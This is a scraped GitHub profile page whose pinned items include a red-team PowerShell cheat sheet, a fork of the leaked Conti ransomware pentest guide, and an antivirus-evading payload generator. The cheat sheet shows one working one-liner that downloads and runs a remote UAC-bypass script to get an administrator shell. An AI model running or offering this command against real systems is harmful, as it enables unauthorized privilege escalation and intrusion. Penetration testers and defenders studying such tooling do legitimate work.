Skip to content
View Udyz's full-sized avatar
Block or Report

Block or report Udyz

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned

  1. RedTeam_CheatSheet.ps1 RedTeam_CheatSheet.ps1
    1
    # Description: 
    2
    #    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
    3
    
                  
    4
    # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
    5
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
  2. conti-pentester-guide-leak conti-pentester-guide-leak Public

    Forked from ForbiddenProgrammer/conti-pentester-guide-leak

    Leaked pentesting manuals given to Conti ransomware crooks

    Batchfile

  3. DoUCMe DoUCMe Public

    Forked from Ben0xA/DoUCMe

    C#

  4. HackTheWorld HackTheWorld Public

    Forked from stormshadow07/HackTheWorld

    An Python Script For Generating Payloads that Bypasses All Antivirus so far .

    Python 1